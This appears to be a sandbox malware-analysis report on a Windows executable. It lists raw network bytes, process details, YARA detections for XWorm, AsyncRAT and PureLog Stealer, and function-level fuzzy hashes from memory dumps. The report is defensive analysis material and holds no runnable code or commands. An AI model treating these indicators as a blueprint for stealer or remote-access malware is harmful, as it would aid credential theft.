2024-04-19 05:35:59 UTC	316	IN	Data Raw: 1b fc 01 1b 91 26 1a f8 71 ec a1 3d 47 fb d2 30 c9 fa f5 73 22 91 20 2e e9 9d ae bc 1a 4c a1 15 74 ee 07 f3 27 23 96 29 4f e1 18 e7 46 30 91 ae 38 01 7e 65 7e 21 81 a3 7d 90 f2 51 21 73 3e 27 47 27 97 20 ca 08 87 6e 08 d6 4f 76 c7 1d d4 8d 17 fb 90 df b3 13 77 a4 37 70 a5 99 1c 51 7c 75 1c 75 4b a5 4a c8 b6 20 19 c0 4e d3 f4 8d 5a d8 6b 6a 00 30 79 66 2f 87 80 48 5d 7b 73 97 05 1d 31 21 c1 ab ee e8 3d 09 33 9c 77 29 cc b9 b9 da 80 02 1a 0b a6 01 89 10 d3 b3 99 0a 5b 03 7a 60 80 9d 28 a6 83 99 ce 34 ec d8 12 90 ea b6 74 c6 28 6a 4f 71 aa 04 f4 51 d9 50 0c e2 e8 3f 78 17 8e d1 91 af f7 c2 2e cf 9d 39 dc c0 db 69 bf 14 93 5f 2b fb 7e a6 d6 d8 67 69 3d 8b 0e 2a 28 f3 ca 74 b4 75 d8 fd 01 58 52 20 fe ef b0 ff ad cb 47 9a 53 f0 95 76 cd e9 40 c6 14 6b 69 37 82 Data Ascii: &q=G0s" .Lt'#)OF08~e~!}Q!s>'G' nOvw7pQ\|uuKJ NZkj0yf/H]{s1!=3w)[z`(4t(jOqQP?x.9i_+~gi=*(tuXR GSv@ki7
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: 26 d7 ae 5a 61 d6 4d ad a7 d4 b0 97 98 38 0f 9a c0 40 48 0a 32 05 2e 78 c9 0b 99 59 97 87 26 cf 93 e9 10 24 3b 31 66 fc 71 46 c8 a9 9a a2 a8 63 36 9e b5 37 d2 b4 d4 97 5d e1 26 68 82 e0 ed 42 0c 30 2b 5a a0 7c 78 e7 7b cf 98 e5 86 e4 4b c7 23 ad 71 b7 cd 93 04 20 dc 13 9c e6 e9 05 ed 55 5a 4f 28 cf 68 17 63 91 06 4e 33 16 7f 00 ab 79 0e cd f9 bc e6 ef 7e 3e 49 b5 98 e2 cb 1d 5b 09 a3 a1 6e 26 9b b4 5e 87 2c 3b c9 7a f1 15 a6 19 06 9e 92 80 66 b2 24 68 b5 11 20 c1 aa 6b e6 d1 6c f1 06 1c 02 c1 2e 9b d0 e1 9e 4a e0 74 40 71 21 75 7a 29 7f d4 8e 5f f7 fe 9a 72 c7 bb 49 53 bb a6 b5 d0 da 69 29 6d 2c 76 0a 18 74 ce f8 bf 30 6a 7a a1 5a c7 5b 6b 06 95 30 eb ed e5 c9 c3 fe e1 32 d1 ee 12 cc 5c 54 6b 4f f6 75 d0 bd 9c 31 f9 85 70 4c 41 f9 ea 25 ba e1 1e 11 7c fe Data Ascii: &ZaM8@H2.xY&$;1fqFc67]&hB0+Z\|x{K#q UZO(hcN3y~>I[n&^,;zf$h kl.Jt@q!uz)_rISi)m,vt0jzZ[k02\TkOu1pLA%\|
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: 15 50 d2 a0 0b 91 99 e9 49 74 bc 23 6f a7 15 77 4c 3a 2c 7d 44 4a 08 26 04 0d 33 a3 bb 0d c3 1d b9 6d 72 fa 8d 12 7c 7b aa bf a3 93 dc eb e5 07 14 d5 e3 c8 81 a7 4d 4d 81 dc b4 fb d7 c7 0f 86 53 3e b5 91 d8 77 2a 8f 25 67 da 33 ea 83 67 55 93 8f 9f 74 c5 4c 20 c9 21 c8 f3 af 9d 52 34 14 c3 3c 2c 83 fd 24 a6 f7 fe af 10 1e 21 42 d3 70 63 89 bf e9 f3 7d cd 0c cb de 8c 92 25 33 b4 4f a4 ee 15 09 48 76 b3 c0 07 18 ab 81 4d 51 e5 b8 a5 ce f2 ec e9 80 da 57 f2 1f 1b 87 55 15 d0 9c 01 46 a4 f8 8a c2 7a 8c d0 63 4a 75 0c be df 2c a8 8c 47 2d ab 6c b6 89 fb 72 e5 a1 77 86 b1 41 2d 41 26 ff 26 dc 75 27 c9 17 bf 82 d3 b1 9f 95 46 22 3b 6f 14 f0 91 0e 64 e2 07 5c 22 d7 34 b7 95 1d 43 c6 d6 6a 73 a0 fd 88 72 91 2f 9b 4c 1b 90 62 77 a8 3d 81 fa 73 b2 b8 c3 7d 84 43 a8 Data Ascii: PIt#owL:,}DJ&3mr\|{MMS>w*%g3gUtL !R4<,$!Bpc}%3OHvMQWUFzcJu,G-lrwA-A&&u'F";od\"4Cjsr/Lbw=s}C
2024-04-19 05:35:59 UTC	1369	IN	Data Raw: cb 0b 2a 0b 13 ca f6 ae fb 8c b3 49 79 56 2c 35 27 6f 9d 4f 54 51 d2 ce 0f 00 4c d1 4f d0 0b e5 4f 14 a0 ff 71 94 23 0a 47 8c 8b 16 0e 7b 01 5c aa c2 79 8b 28 df 06 64 c6 43 6a b5 10 af 9e 61 07 cd a1 50 01 42 21 6d fe 97 21 eb 60 95 83 f5 fb 71 10 78 62 79 41 83 4e e0 49 a7 84 f0 f8 c2 c0 eb 9f 16 f1 07 c3 7c 35 c3 72 11 64 ff 93 98 f7 24 39 43 2f 21 94 ab d7 d9 77 3c 2b db f6 57 7a 0e 0c 50 6e a2 61 b6 12 79 dd 7c 0f 4c c6 5c aa 2c 6f d1 40 06 61 ff d6 22 4f f1 97 a2 54 77 15 1e 96 04 ea 70 b5 62 61 be a5 be 13 b1 3a 9a 15 b8 e3 63 65 42 28 b5 9a e6 4b 4e e1 13 3a 56 d9 ad a0 c7 a5 e0 d2 c3 3f 15 df a9 e6 5f 11 53 a1 44 49 50 1f ed 4d dd bf e0 69 50 17 c1 59 61 0a 99 9e df 2a c0 3f e7 2a 22 ed b8 cf a7 75 7b 31 cb 39 a4 2b 6c af 68 61 2a 3b 2d 45 18 a6 Data Ascii: IyV,5'oOTQLOOq#G{\y(dCjaPB!m!`qxbyANI\|5rd$9C/!w<+WzPnay\|L\,o@a"OTwpba:ceB(KN:V?_SDIPMiPYa?"u{19+lha;-E

Target ID:	0
Start time:	07:35:57
Start date:	19/04/2024
Path:	C:\Users\user\Desktop\KjCBSM7Ukv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KjCBSM7Ukv.exe"
Imagebase:	0x110000
File size:	51'480 bytes
MD5 hash:	FE7C4B36FCA4FDF53789979A4A09C880
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1661567494.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1662763939.00000000063D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1650015728.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1658667016.0000000005570000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1652553493.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1652553493.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:35:59
Start date:	19/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
Imagebase:	0xa80000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:36:03
Start date:	19/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 1668
Imagebase:	0x400000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 0225E058 Relevance: 7.2, Strings: 5, Instructions: 983COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0225EB2B
Te^q, xrefs: 0225E77B
pbq, xrefs: 0225EC12
xbaq, xrefs: 0225E185
TJcq, xrefs: 0225E1FA

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$pbq$xbaq
API String ID: 0-2576840827
Opcode ID: 5bc5d74060e463a9e4e738673eaed5ed33e45e87eb5822fddcc14ec53cf71337
Instruction ID: dc7a0fd1e9312f3929b4b5c63f88aef51ea170b286771a758054560739e7b664
Opcode Fuzzy Hash: 5bc5d74060e463a9e4e738673eaed5ed33e45e87eb5822fddcc14ec53cf71337
Instruction Fuzzy Hash: 5EA2B875E10228CFDB64CF69C984A99BBB2FF89304F1581E9D509AB365DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 063CD5F0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Deq, xrefs: 063CD6F5

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 63a7746e4ef1f6c3751fed9f36a7e0f02dd1290be0f541d0a432ccf57b832a05
Instruction ID: 7458c17afc9767dae0e5429a1fa26f2b61239ac3f0f1ea5656181f504e4202b8
Opcode Fuzzy Hash: 63a7746e4ef1f6c3751fed9f36a7e0f02dd1290be0f541d0a432ccf57b832a05
Instruction Fuzzy Hash: 77D1C374E11218CFDB54DFA9D984B9DBBB2BF88300F1081A9E409AB365DB31AD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 063CEC70 Relevance: 4.1, Strings: 3, Instructions: 370COMMON

Download Yara Rule

Strings

4'^q, xrefs: 063CEF69
4'^q, xrefs: 063CEE8A
4'^q, xrefs: 063CEFE9

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 4b45d59e69ba31c8c4f45d289d0eb8a5d132295faeb662491cb4b7c3d9a3d05d
Instruction ID: 67d3fd75d0d8ba0a5921b302b165c96fa890db67eab58f3cdb49008aed84509e
Opcode Fuzzy Hash: 4b45d59e69ba31c8c4f45d289d0eb8a5d132295faeb662491cb4b7c3d9a3d05d
Instruction Fuzzy Hash: FDF1ED34B10118DFDB04DFA4D998AADBBB2FF88310F558559E406AB3A5DB71EC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 022509E2 Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02250AA4
Te^q, xrefs: 02250A91

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 40a864adb27b5fe99a4f103dfe72155f2ac7a4ea964983bb711e223787b1023f
Instruction ID: 2aff1376d7c27b974a60c5beb193739e8f6135c108597d5197f4a2a6b618fa59
Opcode Fuzzy Hash: 40a864adb27b5fe99a4f103dfe72155f2ac7a4ea964983bb711e223787b1023f
Instruction Fuzzy Hash: D7314670F102199BCB14EFA9D9546AEBAF7AF88700F148429D405EB3A4DF745E01CF85

Uniqueness

Uniqueness Score: -1.00%

Function 02250A4C Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02250AA4
Te^q, xrefs: 02250A91

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 2e974e75e4df47ab9b221d03f102683fe656899846805dec00a72594cebb9a9a
Instruction ID: 052d52a7e41adedd6dc8423007fb68d55dc3c418f70555d0623426f67aecd28f
Opcode Fuzzy Hash: 2e974e75e4df47ab9b221d03f102683fe656899846805dec00a72594cebb9a9a
Instruction Fuzzy Hash: 1E213330B501198FCB14EFA9D99476DBAE7AF88704F248469D402EB3A8DF749E41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 063B728B Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

;, xrefs: 063C0D5C
), xrefs: 063C0D2D

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: )$;
API String ID: 0-2285808895
Opcode ID: be8e040ab9113866902e2da58823049174af102aba342d75d752eb4d87f242ed
Instruction ID: fd0226ad05c8a7bb7f149b65b3caf7e7316b94086b991ba93447faf471f8cd09
Opcode Fuzzy Hash: be8e040ab9113866902e2da58823049174af102aba342d75d752eb4d87f242ed
Instruction Fuzzy Hash: 2631E474A142688FCB68DF18D998A9DB7B5BB48308F1445E9E509A7684CB345EC8CF80

Uniqueness

Uniqueness Score: -1.00%

Function 063B4DB2 Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

;, xrefs: 063C0D5C
), xrefs: 063C0D2D

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: )$;
API String ID: 0-2285808895
Opcode ID: c484d380f4b078b24695974b49ba7eb84c229368bfd42714b68c2d9a27fff561
Instruction ID: 065d4a03019418c07d154fc12d91c3d6168db1e5abfc4870e88b2ba63329333d
Opcode Fuzzy Hash: c484d380f4b078b24695974b49ba7eb84c229368bfd42714b68c2d9a27fff561
Instruction Fuzzy Hash: 7431E474E142698FDBA8DF14C998BADBBB0BB44308F1444E9E51DA7644CB345EC8CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02250B73 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

<duq, xrefs: 02250C5E

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: <duq
API String ID: 0-2704095200
Opcode ID: 4a7a0829df4fa0b03ee153b74fa4966afd9ea41ec305cd4cda30cfd74cb2c654
Instruction ID: 3a33eddf7b504317840f0fda692e9df2274efe64dd6546b75f550fd08970e407
Opcode Fuzzy Hash: 4a7a0829df4fa0b03ee153b74fa4966afd9ea41ec305cd4cda30cfd74cb2c654
Instruction Fuzzy Hash: 3841CE35A10119DFCB04CF98C9809ADBBB2FF8C314F248895E815AB365C732EE42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 063CDE58 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570b9cf1567c9e7a4a15b3b4bfa51a89850ebbf82318745a631c498e10378a55
Instruction ID: be816a45cb7d50cc4915e60e6c1eaab508b2412cd0c62269611413414a6d8744
Opcode Fuzzy Hash: 570b9cf1567c9e7a4a15b3b4bfa51a89850ebbf82318745a631c498e10378a55
Instruction Fuzzy Hash: 7FB1D174E05218CFEB90DFA9D9846AEBBB9BB48315F10402AF406AB784CB345D49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02250881 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0873c02728c4c77814d766dc2dd00497d9770656c74043ebf1e6c80fabe5c91
Instruction ID: 09021a2ee92a74c4240bc4c739803afda85cb55ceea7fa6419311f1167ae9fdf
Opcode Fuzzy Hash: f0873c02728c4c77814d766dc2dd00497d9770656c74043ebf1e6c80fabe5c91
Instruction Fuzzy Hash: 9E417075A0424A8FCB11DFA8D9509AFFBB5FF89300B10C56AD814EB38AD734A905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 022508A8 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed353ff7b9b0f0ef1e2a80f2beeee420a7b5f7cb074e2d33e06f4746bf237d84
Instruction ID: 23c4eee79fd475d718bfe231202338118d531e4072fc9aff48a3bbfaf8441fbf
Opcode Fuzzy Hash: ed353ff7b9b0f0ef1e2a80f2beeee420a7b5f7cb074e2d33e06f4746bf237d84
Instruction Fuzzy Hash: 47311E75A0020A8FCB11DFA9D9915AFFBB5FF88310B10C669D814AB389E730E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 063CF5E0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a089d8e114e2295cf5d51d91912b15fcd0075abd9fbe98fbd41217d2afee6661
Instruction ID: 9b33b9d89811ad9a152ea683285794fe2e0490da35f867a3f9e5cd875e43ca20
Opcode Fuzzy Hash: a089d8e114e2295cf5d51d91912b15fcd0075abd9fbe98fbd41217d2afee6661
Instruction Fuzzy Hash: CB21A732705A008FC7609B69F544A26BBE6EFC0321B1985BEE15DCB261DB32EC59C790

Uniqueness

Uniqueness Score: -1.00%

Function 021CD030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649453702.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21cd000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0fc75a864070ad8aa52b5b48227cc2e27daa23e5103e07b97c87357389826d
Instruction ID: 574cd6115427a19d6e6a502e2e5bbeb9f95fa0ce852d5f0e8d744214a7bec668
Opcode Fuzzy Hash: 5b0fc75a864070ad8aa52b5b48227cc2e27daa23e5103e07b97c87357389826d
Instruction Fuzzy Hash: B2210379544200DFDB14DF18E9C4B2ABFA5EB98324F30C17DD8090B246C336D416CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0225DCA8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bae2261502ab56330ae63fbeaafb5f9e7c9f9c3e36c31c23c5d9e4f34a751c
Instruction ID: c9629077184629e2cc988f4e142e832cc575ec6d5d5fafa463144e1bf4c7b3fd
Opcode Fuzzy Hash: c1bae2261502ab56330ae63fbeaafb5f9e7c9f9c3e36c31c23c5d9e4f34a751c
Instruction Fuzzy Hash: 5D214AB4D64218DFDB04DFA9D1453ADBBF5FB48306F20C4A9E806A7244D7B59A84CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0225F278 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886af2ae59559c5a35740dd3c5194445b0326ade191bb7f878c8a744c1bac4d9
Instruction ID: 6d8b56f4e9c7a35f15bb6fa7104ceb996a19b479ccc4f962ff7864a6fae526af
Opcode Fuzzy Hash: 886af2ae59559c5a35740dd3c5194445b0326ade191bb7f878c8a744c1bac4d9
Instruction Fuzzy Hash: 4E1159B4D1021ADBCB04CFE9D9446EEBBB5FB89310F00802AE904E3204D7B45945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 021CD02B Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649453702.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21cd000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction ID: 169b800a86a625e21c450f3e573924437d5f1b878424598721de42a208f71f32
Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
Instruction Fuzzy Hash: FA11D37A544280CFCB11CF14E9C4B16BF71FB84324F24C1AED8090B656C336D41ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 063CDA78 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52fcbfa322e658563aa33d78f07986a89cb5c718a87de0a1ded2bf73ccf13b14
Instruction ID: 1fe2839ede99b1c754609f0ad7172f88938b6f113fa33f8827cc51c603d7d77b
Opcode Fuzzy Hash: 52fcbfa322e658563aa33d78f07986a89cb5c718a87de0a1ded2bf73ccf13b14
Instruction Fuzzy Hash: C511F7B4E0020D9FCB44DFA9C9456AFFBF5BF88300F208569A418A7354DA309A418F91

Uniqueness

Uniqueness Score: -1.00%

Function 063B6A84 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2369a45c14c69129cafd3f8e964c0ecff026e9d8f6db1825684a1abc40a50938
Instruction ID: e6517a147199b0b89275c930b934d0be704ff102d4a3eb0ca74bf1010de3571d
Opcode Fuzzy Hash: 2369a45c14c69129cafd3f8e964c0ecff026e9d8f6db1825684a1abc40a50938
Instruction Fuzzy Hash: 6501D678A05229CFDBA4DF18D988B9AB7B5FB08304F1050E9E51DA7755DB309E84CF80

Uniqueness

Uniqueness Score: -1.00%

Function 063B68C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb6fff2c511f0afa6f3dc593529231d14b89efd5ae23f1e63e1a02ab1bdeb9d
Instruction ID: 9cf9de325edea278ca3feefa119fee563b6dc1e9dc73472d21684f713d83d97c
Opcode Fuzzy Hash: 4eb6fff2c511f0afa6f3dc593529231d14b89efd5ae23f1e63e1a02ab1bdeb9d
Instruction Fuzzy Hash: E6014B7491512DCFDBA89F54E9557DAB7B6FB48305F0044E8E60AA7680CB721E84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 063B068C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3178d645e2136720be08027160de6dc3c0b7c9421061245a799cfb41e711516
Instruction ID: 5fd3ed6561de736a1a0006eb735e66de26b7f869f42322cac6ee2899534b192c
Opcode Fuzzy Hash: d3178d645e2136720be08027160de6dc3c0b7c9421061245a799cfb41e711516
Instruction Fuzzy Hash: 1201C478A052298FCB64DF58DA95ADABBB9FF48304F1040E9E809E7745DB305E90CF42

Uniqueness

Uniqueness Score: -1.00%

Function 063CDDF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f1ec09dff6ebd5a46bb42563d8148d428de616e40445ba6e671318a62404995
Instruction ID: 2caa72a33252f921a2e3764d9ddf98f588c5a70285bb78d86c9d4eeab0ba422c
Opcode Fuzzy Hash: 7f1ec09dff6ebd5a46bb42563d8148d428de616e40445ba6e671318a62404995
Instruction Fuzzy Hash: F2F0F874E04248EFCB80DFA9D840AADFBF8AB48210F14C0AAB858D3241D6359A61DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0225F068 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e07866978928dbd5c6b9f11583ec3b2cf7056d8eebedb6db07c3936e6f5de9
Instruction ID: d299334489682da6745b173b1a9b3e9b3ac668398c66411779263a9e682f64a3
Opcode Fuzzy Hash: b8e07866978928dbd5c6b9f11583ec3b2cf7056d8eebedb6db07c3936e6f5de9
Instruction Fuzzy Hash: EBF0F234E04208AFCB80DFA8D540AACFBB4EB48310F14C0AAAC18A3344D6329A51DF40

